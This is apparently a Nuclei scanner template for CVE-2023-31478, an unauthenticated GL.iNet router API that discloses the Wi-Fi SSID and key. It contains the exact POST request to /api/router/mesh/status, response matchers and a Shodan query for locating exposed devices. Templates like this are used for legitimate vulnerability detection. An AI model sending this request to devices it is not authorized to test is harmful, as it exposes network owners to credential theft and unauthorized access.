id: CVE-2023-31478 info: name: GL.iNET SSID Key Disclosure author: DhiyaneshDK severity: high description: | An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key. impact: | Unauthenticated attackers can retrieve Wi-Fi SSID and password information through the mesh status API endpoint, potentially allowing unauthorized access to the wireless network and intercepting network traffic. remediation: | Update GL.iNET firmware to version 3.216 or later that requires authentication for the /api/router/mesh/status endpoint and protects Wi-Fi credentials. reference: - https://www.gl-inet.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-31478 epss-score: 0.85907 epss-percentile: 0.99402 cpe: cpe:2.3:o:gl-inet:gl-s20_firmware:*:*:*:*:*:*:*:* metadata: vendor: gl-inet product: gl-s20_firmware verified: true max-request: 1 shodan-query: title:"GL.iNet Admin Panel" tags: cve,cve2023,gl-inet,disclosure,vkev,vuln http: - raw: - | POST /api/router/mesh/status HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded mac= matchers-condition: and matchers: - type: word part: body words: - '"ssid":' - '"encryption":' condition: and - type: status status: - 200 # digest: 4a0a00473045022100e9e45133865fb74aa9d7f718854ecef4c6a45a8f8b4cc0784728a3f7a36355ee022027879f789ef13aa5e7c1083a28f29146118a1c5b1ffd4d822a0fbbb9809d0a3c:922c64590222798bb761d5b6d8e72950